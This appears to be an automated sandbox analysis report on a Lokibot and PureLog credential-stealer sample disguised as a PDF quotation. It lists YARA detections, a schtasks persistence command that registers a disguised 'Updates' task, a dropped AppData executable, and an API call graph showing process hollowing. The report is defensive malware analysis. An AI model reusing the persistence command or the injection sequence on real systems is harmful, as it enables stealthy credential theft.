                                                                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1751386297.0000000003CA8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1751386297.0000000003CEA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 24%, ReversingLabs
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:10
                                                                                    Start time:06:32:00
                                                                                    Start date:07/01/2025
                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                    Imagebase:0x7ff693ab0000
                                                                                    File size:496'640 bytes
                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:11
                                                                                    Start time:06:32:03
                                                                                    Start date:07/01/2025
                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp36D0.tmp"
                                                                                    Imagebase:0x430000
                                                                                    File size:187'904 bytes
                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:12
                                                                                    Start time:06:32:03
                                                                                    Start date:07/01/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:13
                                                                                    Start time:06:32:03
                                                                                    Start date:07/01/2025
                                                                                    Path:C:\Users\user\AppData\Roaming\mexnJkivovwH.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\mexnJkivovwH.exe"
                                                                                    Imagebase:0x8c0000
                                                                                    File size:725'512 bytes
                                                                                    MD5 hash:FF0A37E1048052C58526A9C38EFC1954
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: Loki_1, Description: Loki Payload, Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                                                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                    Has exited:true

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:14.6%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:6.8%
                                                                                      Total number of Nodes:219
                                                                                      Total number of Limit Nodes:14
                                                                                      execution_graph 39546 18c0848 39547 18c085c 39546->39547 39548 18c0898 39547->39548 39550 18c8568 39547->39550 39552 18c8594 39550->39552 39551 18c8629 39551->39547 39552->39551 39555 18c948c 39552->39555 39559 18c94b0 39552->39559 39556 18c94b0 39555->39556 39563 18c94e7 39556->39563 39560 18c94c7 39559->39560 39562 18c94e7 NtQueryInformationProcess 39560->39562 39561 18c94db 39561->39552 39562->39561 39564 18c9518 39563->39564 39568 18c9558 39564->39568 39572 18c9547 39564->39572 39565 18c94db 39565->39552 39570 18c957c 39568->39570 39569 18c9679 39569->39565 39570->39569 39576 18c07f4 39570->39576 39573 18c9558 39572->39573 39574 18c9679 39573->39574 39575 18c07f4 NtQueryInformationProcess 39573->39575 39574->39565 39575->39573 39577 18c9758 NtQueryInformationProcess 39576->39577 39579 18c981f 39577->39579 39579->39570 39761 18c8468 39762 18c84b5 VirtualProtect 39761->39762 39763 18c8521 39762->39763 39492 3058880 39493 3058887 DuplicateHandle 39492->39493 39494 305895d 39493->39494 39580 3050040 39581 30500d0 CreateActCtxA 39580->39581 39583 3050146 39581->39583 39583->39583 39584 a0857c0 39585 a08581c DrawTextExW 39584->39585 39587 a0858cd 39585->39587 39588 12510798 39589 125107b2 39588->39589 39610 12511351 39589->39610 39614 12510d2e 39589->39614 39619 12510dae 39589->39619 39623 1251106e 39589->39623 39626 12510e2d 39589->39626 39631 12510f28 39589->39631 39635 12510b66 39589->39635 39640 12510c47 39589->39640 39644 12510fe5 39589->39644 39649 12510d22 39589->39649 39654 12510ba3 39589->39654 39659 12510ee0 39589->39659 39664 12510ca1 39589->39664 39669 12510fbf 39589->39669 39674 125110ff 39589->39674 39679 12510e1b 39589->39679 39684 12510d78 39589->39684 39689 12510d17 39589->39689 39697 12510dd4 39589->39697 39590 125107d6 39611 125115e3 39610->39611 39702 a1bdbb8 39611->39702 39615 12510cad 39614->39615 39706 a1bd448 39615->39706 39710 a1bd440 39615->39710 39616 12510e59 39616->39590 39620 1251147f 39619->39620 39622 a1bdbb8 WriteProcessMemory 39620->39622 39621 12511604 39622->39621 39625 a1bdbb8 WriteProcessMemory 39623->39625 39624 12510fe9 39624->39590 39625->39624 39627 12510e33 39626->39627 39629 a1bd448 ResumeThread 39627->39629 39630 a1bd440 ResumeThread 39627->39630 39628 12510e59 39628->39590 39629->39628 39630->39628 39714 a1bda98 39631->39714 39718 a1bda90 39631->39718 39632 12510f4a 39632->39590 39636 12510b72 39635->39636 39722 a1bdf40 39636->39722 39726 a1bdf34 39636->39726 39641 12510c82 39640->39641 39642 a1bdf40 CreateProcessA 39640->39642 39643 a1bdf34 CreateProcessA 39640->39643 39641->39590 39642->39641 39643->39641 39645 1251101f 39644->39645 39646 12510fe9 39644->39646 39645->39646 39648 a1bdbb8 WriteProcessMemory 39645->39648 39646->39590 39647 125114f2 39648->39647 39650 125112b3 39649->39650 39730 a1bdd0a 39650->39730 39734 a1bdd10 39650->39734 39651 125110eb 39651->39590 39655 12510b72 39654->39655 39657 a1bdf40 CreateProcessA 39655->39657 39658 a1bdf34 CreateProcessA 39655->39658 39656 12510c82 39656->39590 39657->39656 39658->39656 39660 12510ee4 39659->39660 39738 a1bd968 39660->39738 39742 a1bd970 39660->39742 39661 12510eff 39665 12510cad 39664->39665 39667 a1bd448 ResumeThread 39665->39667 39668 a1bd440 ResumeThread 39665->39668 39666 12510e59 39666->39590 39667->39666 39668->39666 39670 12510e2d 39669->39670 39671 12510e59 39670->39671 39672 a1bd448 ResumeThread 39670->39672 39673 a1bd440 ResumeThread 39670->39673 39671->39590 39672->39671 39673->39671 39675 1251110e 39674->39675 39677 a1bd968 Wow64SetThreadContext 39675->39677 39678 a1bd970 Wow64SetThreadContext 39675->39678 39676 12510ec4 39677->39676 39678->39676 39680 12510ee4 39679->39680 39682 a1bd968 Wow64SetThreadContext 39680->39682 39683 a1bd970 Wow64SetThreadContext 39680->39683 39681 12510eff 39682->39681 39683->39681 39685 12510d7b 39684->39685 39686 12510f4a 39685->39686 39687 a1bda98 VirtualAllocEx 39685->39687 39688 a1bda90 VirtualAllocEx 39685->39688 39686->39590 39687->39686 39688->39686 39690 12510d1b 39689->39690 39691 12510d7b 39689->39691 39693 a1bd448 ResumeThread 39690->39693 39694 a1bd440 ResumeThread 39690->39694 39692 12510e59 39691->39692 39695 a1bda98 VirtualAllocEx 39691->39695 39696 a1bda90 VirtualAllocEx 39691->39696 39692->39590 39693->39692 39694->39692 39695->39692 39696->39692 39698 12510cad 39697->39698 39700 a1bd448 ResumeThread 39698->39700 39701 a1bd440 ResumeThread 39698->39701 39699 12510e59 39699->39590 39700->39699 39701->39699 39703 a1bdc04 WriteProcessMemory 39702->39703 39705 a1bdc9d 39703->39705 39707 a1bd48c ResumeThread 39706->39707 39709 a1bd4d8 39707->39709 39709->39616 39711 a1bd48c ResumeThread 39710->39711 39713 a1bd4d8 39711->39713 39713->39616 39715 a1bdadc VirtualAllocEx 39714->39715 39717 a1bdb54 39715->39717 39717->39632 39719 a1bda98 VirtualAllocEx 39718->39719 39721 a1bdb54 39719->39721 39721->39632 39723 a1bdfc7 CreateProcessA 39722->39723 39725 a1be21c 39723->39725 39727 a1bdfc7 39726->39727 39727->39727 39728 a1be1b2 CreateProcessA 39727->39728 39729 a1be21c 39728->39729 39731 a1bdd5c ReadProcessMemory 39730->39731 39733 a1bddd4 39731->39733 39733->39651 39735 a1bdd5c ReadProcessMemory 39734->39735 39737 a1bddd4 39735->39737 39737->39651 39739 a1bd9b9 Wow64SetThreadContext 39738->39739 39741 a1bda31 39739->39741 39741->39661 39743 a1bd9b9 Wow64SetThreadContext 39742->39743 39745 a1bda31 39743->39745 39745->39661 39495 18ca298 39497 18ca2c2 39495->39497 39499 18c9ea0 39497->39499 39503 18c9eac 39497->39503 39500 18ca7b8 OutputDebugStringW 39499->39500 39502 18ca864 39500->39502 39502->39497 39504 18ca8b0 CloseHandle 39503->39504 39506 18ca940 39504->39506 39506->39497 39507 128d01c 39508 128d034 39507->39508 39509 128d08e 39508->39509 39514 305c2fc 39508->39514 39518 305d1c8 39508->39518 39522 305d1b8 39508->39522 39526 305dfe8 39508->39526 39515 305c307 39514->39515 39517 305e049 39515->39517 39530 305c424 CallWindowProcW 39515->39530 39517->39517 39519 305d1cf 39518->39519 39520 305c2fc CallWindowProcW 39519->39520 39521 305d20f 39520->39521 39521->39509 39523 305d1c8 39522->39523 39524 305c2fc CallWindowProcW 39523->39524 39525 305d20f 39524->39525 39525->39509 39528 305e025 39526->39528 39529 305e049 39528->39529 39531 305c424 CallWindowProcW 39528->39531 39529->39529 39530->39517 39531->39529 39764 305f671 39769 305f68d 39764->39769 39765 305f6e2 39768 305f73a CallWindowProcW 39765->39768 39770 305f6e9 39765->39770 39766 305f78c 39767 305c2fc CallWindowProcW 39766->39767 39767->39770 39768->39770 39769->39765 39769->39766 39532 305cf30 39533 305cf37 CreateWindowExW 39532->39533 39535 305d106 39533->39535 39535->39535 39771 12511928 39772 12511ab3 39771->39772 39773 1251194e 39771->39773 39773->39772 39776 12511c00 PostMessageW 39773->39776 39778 12511bf9 PostMessageW 39773->39778 39777 12511cad 39776->39777 39777->39773 39779 12511cad 39778->39779 39779->39773 39536 3058638 39537 305863f GetCurrentProcess 39536->39537 39539 30586d0 GetCurrentThread 39537->39539 39540 30586c9 39537->39540 39541 3058706 39539->39541 39542 305870d GetCurrentProcess 39539->39542 39540->39539 39541->39542 39543 3058743 39542->39543 39544 305876b GetCurrentThreadId 39543->39544 39545 305879c 39544->39545 39746 3056158 39747 3056167 39746->39747 39750 3056250 39746->39750 39755 3056242 39746->39755 39751 3056284 39750->39751 39752 3056261 39750->39752 39751->39747 39752->39751 39753 30564a5 GetModuleHandleW 39752->39753 39754 30564e4 39753->39754 39754->39747 39756 30561f0 39755->39756 39758 305624a 39755->39758 39756->39747 39757 3056284 39757->39747 39758->39757 39759 30564a5 GetModuleHandleW 39758->39759 39760 30564e4 39759->39760 39760->39747

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 379 a1b0730-a1b0751 380 a1b0758-a1b0844 379->380 381 a1b0753 379->381 383 a1b084a-a1b099e 380->383 384 a1b1071-a1b1099 380->384 381->380 428 a1b103f-a1b106e 383->428 429 a1b09a4-a1b09ff 383->429 387 a1b177b-a1b1784 384->387 389 a1b178a-a1b17a1 387->389 390 a1b10a7-a1b10b0 387->390 392 a1b10b2 390->392 393 a1b10b7-a1b1196 call a1b19d0 390->393 392->393 409 a1b119c-a1b11a9 393->409 410 a1b11ab-a1b11b7 409->410 411 a1b11d3 409->411 413 a1b11b9-a1b11bf 410->413 414 a1b11c1-a1b11c7 410->414 415 a1b11d9-a1b11f8 411->415 416 a1b11d1 413->416 414->416 420 a1b11fa-a1b1253 415->420 421 a1b1258-a1b12d0 415->421 416->415 433 a1b1778 420->433 440 a1b12d2-a1b1325 421->440 441 a1b1327-a1b136a 421->441 428->384 435 a1b0a01 429->435 436 a1b0a04-a1b0a0f 429->436 433->387 435->436 439 a1b0f53-a1b0f59 436->439 442 a1b0f5f-a1b0fdc 439->442 443 a1b0a14-a1b0a32 439->443 468 a1b1375-a1b137b 440->468 441->468 486 a1b1029-a1b102f 442->486 445 a1b0a89-a1b0a9e 443->445 446 a1b0a34-a1b0a38 443->446 451 a1b0aa0 445->451 452 a1b0aa5-a1b0abb 445->452 446->445 450 a1b0a3a-a1b0a45 446->450 455 a1b0a7b-a1b0a81 450->455 451->452 453 a1b0abd 452->453 454 a1b0ac2-a1b0ad9 452->454 453->454 458 a1b0adb 454->458 459 a1b0ae0-a1b0af6 454->459 461 a1b0a83-a1b0a84 455->461 462 a1b0a47-a1b0a4b 455->462 458->459 466 a1b0af8 459->466 467 a1b0afd-a1b0b04 459->467 469 a1b0b07-a1b0b78 461->469 464 a1b0a4d 462->464 465 a1b0a51-a1b0a69 462->465 464->465 471 a1b0a6b 465->471 472 a1b0a70-a1b0a78 465->472 466->467 467->469 473 a1b13d2-a1b13de 468->473 474 a1b0b7a 469->474 475 a1b0b8e-a1b0d06 469->475 471->472 472->455 476 a1b137d-a1b139f 473->476 477 a1b13e0-a1b1467 473->477 474->475 478 a1b0b7c-a1b0b88 474->478 483 a1b0d08 475->483 484 a1b0d1c-a1b0e57 475->484 481 a1b13a1 476->481 482 a1b13a6-a1b13cf 476->482 508 a1b15ec-a1b15f5 477->508 478->475 481->482 482->473 483->484 487 a1b0d0a-a1b0d16 483->487 497 a1b0ebb-a1b0ed0 484->497 498 a1b0e59-a1b0e5d 484->498 488 a1b0fde-a1b1026 486->488 489 a1b1031-a1b1037 486->489 487->484 488->486 489->428 500 a1b0ed2 497->500 501 a1b0ed7-a1b0ef8 497->501 498->497 502 a1b0e5f-a1b0e6e 498->502 500->501 505 a1b0efa 501->505 506 a1b0eff-a1b0f1e 501->506 507 a1b0ead-a1b0eb3 502->507 505->506 513 a1b0f20 506->513 514 a1b0f25-a1b0f45 506->514 509 a1b0e70-a1b0e74 507->509 510 a1b0eb5-a1b0eb6 507->510 511 a1b15fb-a1b1656 508->511 512 a1b146c-a1b1481 508->512 516 a1b0e7e-a1b0e9f 509->516 517 a1b0e76-a1b0e7a 509->517 515 a1b0f50 510->515 536 a1b1658-a1b168b 511->536 537 a1b168d-a1b16b7 511->537 518 a1b148a-a1b15e0 512->518 519 a1b1483 512->519 513->514 520 a1b0f4c 514->520 521 a1b0f47 514->521 515->439 523 a1b0ea1 516->523 524 a1b0ea6-a1b0eaa 516->524 517->516 540 a1b15e6 518->540 519->518 525 a1b151a-a1b155a 519->525 526 a1b155f-a1b159f 519->526 527 a1b1490-a1b14d0 519->527 528 a1b14d5-a1b1515 519->528 520->515 521->520 523->524 524->507 525->540 526->540 527->540 528->540 545 a1b16c0-a1b176c 536->545 537->545 540->508 545->433
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'^q$TJcq$Te^q$\ lw$pbq$xbaq
                                                                                      • API String ID: 0-129839065
                                                                                      • Opcode ID: 09b3906f2279144eef6ef4def95d6b2eaf0c304b4a95743dd59cb4c2f9b78de4
                                                                                      • Instruction ID: b5001fccacca62168847858e5aa0031f3ec95ffe22a244c4749a347e9923c1ea
                                                                                      • Opcode Fuzzy Hash: 09b3906f2279144eef6ef4def95d6b2eaf0c304b4a95743dd59cb4c2f9b78de4
                                                                                      • Instruction Fuzzy Hash: 4BB2C275E00228DFDB64CF69C984AD9BBB2FF89304F1581E9D509AB265DB319E81CF40

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 751 18c35f9-18c3635 753 18c363c-18c3659 751->753 754 18c3637 751->754 755 18c3661 753->755 754->753 756 18c3668-18c3684 755->756 757 18c368d-18c368e 756->757 758 18c3686 756->758 767 18c3a00-18c3a21 757->767 780 18c3693-18c36a5 757->780 758->755 759 18c37ee-18c3800 758->759 760 18c3969-18c396d 758->760 761 18c388a-18c389c 758->761 762 18c38cb-18c38d7 758->762 763 18c3805-18c380e 758->763 764 18c36a7-18c36be 758->764 765 18c3707-18c3720 call 18c3c38 758->765 766 18c36c0-18c36c4 758->766 758->767 768 18c38a1-18c38ad 758->768 769 18c3742-18c374e 758->769 770 18c393c-18c3948 758->770 771 18c39be-18c39cb 758->771 772 18c3999-18c399f 758->772 773 18c3779-18c3790 758->773 774 18c383a-18c384f 758->774 775 18c37ba-18c37c6 758->775 776 18c3854-18c386c 758->776 777 18c3795-18c37b5 758->777 778 18c36f0-18c3702 758->778 779 18c39d0-18c39d4 758->779 758->780 759->756 797 18c396f-18c397e 760->797 798 18c3980-18c3987 760->798 761->756 787 18c38de-18c38f4 762->787 788 18c38d9 762->788 791 18c3810-18c381f 763->791 792 18c3821-18c3828 763->792 764->756 802 18c3726-18c373d 765->802 799 18c36c6-18c36d5 766->799 800 18c36d7-18c36de 766->800 781 18c38af 768->781 782 18c38b4-18c38c6 768->782 785 18c3755-18c3774 769->785 786 18c3750 769->786 793 18c394f-18c3964 770->793 794 18c394a 770->794 771->756 801 18c39a7-18c39b9 772->801 773->756 774->756 789 18c37cd-18c37e9 775->789 790 18c37c8 775->790 795 18c386e 776->795 796 18c3873-18c3885 776->796 777->756 778->756 783 18c39d6-18c39e5 779->783 784 18c39e7-18c39ee 779->784 780->756 781->782 782->756 803 18c39f5-18c39fb 783->803 784->803 785->756 786->785 816 18c38fb-18c3911 787->816 817 18c38f6 787->817 788->787 789->756 790->789 806 18c382f-18c3835 791->806 792->806 793->756 794->793 795->796 796->756 804 18c398e-18c3994 797->804 798->804 808 18c36e5-18c36eb 799->808 800->808 801->756 802->756 803->756 804->756 806->756 808->756 819 18c3918-18c3937 816->819 820 18c3913 816->820 817->816 819->756 820->819
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ?",<$_#s\
                                                                                      • API String ID: 0-748467163
                                                                                      • Opcode ID: 0cabd7f161e509551276b51ec90a2560cd451efa71835680e4413ddd5d0ee96e
                                                                                      • Instruction ID: 6823eeab698922e8a68b23cfc884cd9f45df9698ce960a3e474f79c94968edb2
                                                                                      • Opcode Fuzzy Hash: 0cabd7f161e509551276b51ec90a2560cd451efa71835680e4413ddd5d0ee96e
                                                                                      • Instruction Fuzzy Hash: E5D10670A0524ADFCB04CFA9D5848AEFBB2FF89740B14D55AD816AB314D734EA42CF94

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 823 18c3610-18c3635 824 18c363c-18c3659 823->824 825 18c3637 823->825 826 18c3661 824->826 825->824 827 18c3668-18c3684 826->827 828 18c368d-18c368e 827->828 829 18c3686 827->829 838 18c3a00-18c3a21 828->838 851 18c3693-18c36a5 828->851 829->826 830 18c37ee-18c3800 829->830 831 18c3969-18c396d 829->831 832 18c388a-18c389c 829->832 833 18c38cb-18c38d7 829->833 834 18c3805-18c380e 829->834 835 18c36a7-18c36be 829->835 836 18c3707-18c3720 call 18c3c38 829->836 837 18c36c0-18c36c4 829->837 829->838 839 18c38a1-18c38ad 829->839 840 18c3742-18c374e 829->840 841 18c393c-18c3948 829->841 842 18c39be-18c39cb 829->842 843 18c3999-18c399f 829->843 844 18c3779-18c3790 829->844 845 18c383a-18c384f 829->845 846 18c37ba-18c37c6 829->846 847 18c3854-18c386c 829->847 848 18c3795-18c37b5 829->848 849 18c36f0-18c3702 829->849 850 18c39d0-18c39d4 829->850 829->851 830->827 868 18c396f-18c397e 831->868 869 18c3980-18c3987 831->869 832->827 858 18c38de-18c38f4 833->858 859 18c38d9 833->859 862 18c3810-18c381f 834->862 863 18c3821-18c3828 834->863 835->827 873 18c3726-18c373d 836->873 870 18c36c6-18c36d5 837->870 871 18c36d7-18c36de 837->871 852 18c38af 839->852 853 18c38b4-18c38c6 839->853 856 18c3755-18c3774 840->856 857 18c3750 840->857 864 18c394f-18c3964 841->864 865 18c394a 841->865 842->827 872 18c39a7-18c39b9 843->872 844->827 845->827 860 18c37cd-18c37e9 846->860 861 18c37c8 846->861 866 18c386e 847->866 867 18c3873-18c3885 847->867 848->827 849->827 854 18c39d6-18c39e5 850->854 855 18c39e7-18c39ee 850->855 851->827 852->853 853->827 874 18c39f5-18c39fb 854->874 855->874 856->827 857->856 887 18c38fb-18c3911 858->887 888 18c38f6 858->888 859->858 860->827 861->860 877 18c382f-18c3835 862->877 863->877 864->827 865->864 866->867 867->827 875 18c398e-18c3994 868->875 869->875 879 18c36e5-18c36eb 870->879 871->879 872->827 873->827 874->827 875->827 877->827 879->827 890 18c3918-18c3937 887->890 891 18c3913 887->891 888->887 890->827 891->890
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ?",<$_#s\
                                                                                      • API String ID: 0-748467163
                                                                                      • Opcode ID: 8222012a7b0bdd1e1e2fbf97b1af3e436b5cbb7097d0bc1cbf483e72b172f68d
                                                                                      • Instruction ID: 343455265b9a5bdb373b11d9815dd98d36f53cbcaefe7f890a8dc3f16ad5e335
                                                                                      • Opcode Fuzzy Hash: 8222012a7b0bdd1e1e2fbf97b1af3e436b5cbb7097d0bc1cbf483e72b172f68d
                                                                                      • Instruction Fuzzy Hash: 2CD1E270E0520ADFCB04CFA9D5848AEFBB2FB89740B54D559D816AB314D734EA82CF94

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 894 18c143f-18c1450 895 18c1465-18c149b 894->895 896 18c1452-18c1461 894->896 898 18c149d 895->898 899 18c14a2-18c14fc call 18c00e4 895->899 896->895 898->899 903 18c14ff 899->903 904 18c1506-18c1522 903->904 905 18c152b-18c152c 904->905 906 18c1524 904->906 907 18c167c-18c16ec call 18c00f4 905->907 913 18c1531-18c1551 905->913 906->903 906->907 908 18c161d-18c1632 906->908 909 18c15a5-18c1601 906->909 910 18c1575-18c1579 906->910 911 18c1606-18c1618 906->911 912 18c1637-18c1677 906->912 906->913 914 18c1553-18c155b call 18c1ce8 906->914 932 18c16ee call 18c338c 907->932 933 18c16ee call 18c2ce5 907->933 934 18c16ee call 18c2e56 907->934 935 18c16ee call 18c2710 907->935 908->904 909->904 915 18c158c-18c1593 910->915 916 18c157b-18c158a 910->916 911->904 912->904 913->904 917 18c1561-18c1573 914->917 919 18c159a-18c15a0 915->919 916->919 917->904 919->904 930 18c16f4-18c16fe 932->930 933->930 934->930 935->930
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Te^q$Te^q
                                                                                      • API String ID: 0-3743469327
                                                                                      • Opcode ID: 9c3e0ad2b01d9ae835aa32a782efe382097cd11258bdea705db448f69a7828dd
                                                                                      • Instruction ID: 977dc0dbec3ab548abff132512b22d394bd9f997b83594f5fade4ab9962ed811
                                                                                      • Opcode Fuzzy Hash: 9c3e0ad2b01d9ae835aa32a782efe382097cd11258bdea705db448f69a7828dd
                                                                                      • Instruction Fuzzy Hash: 5A91E874E01249CFDB08CFA9D8846ADFBB2FF89704F24842AE415AB355D7359A06CF54

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
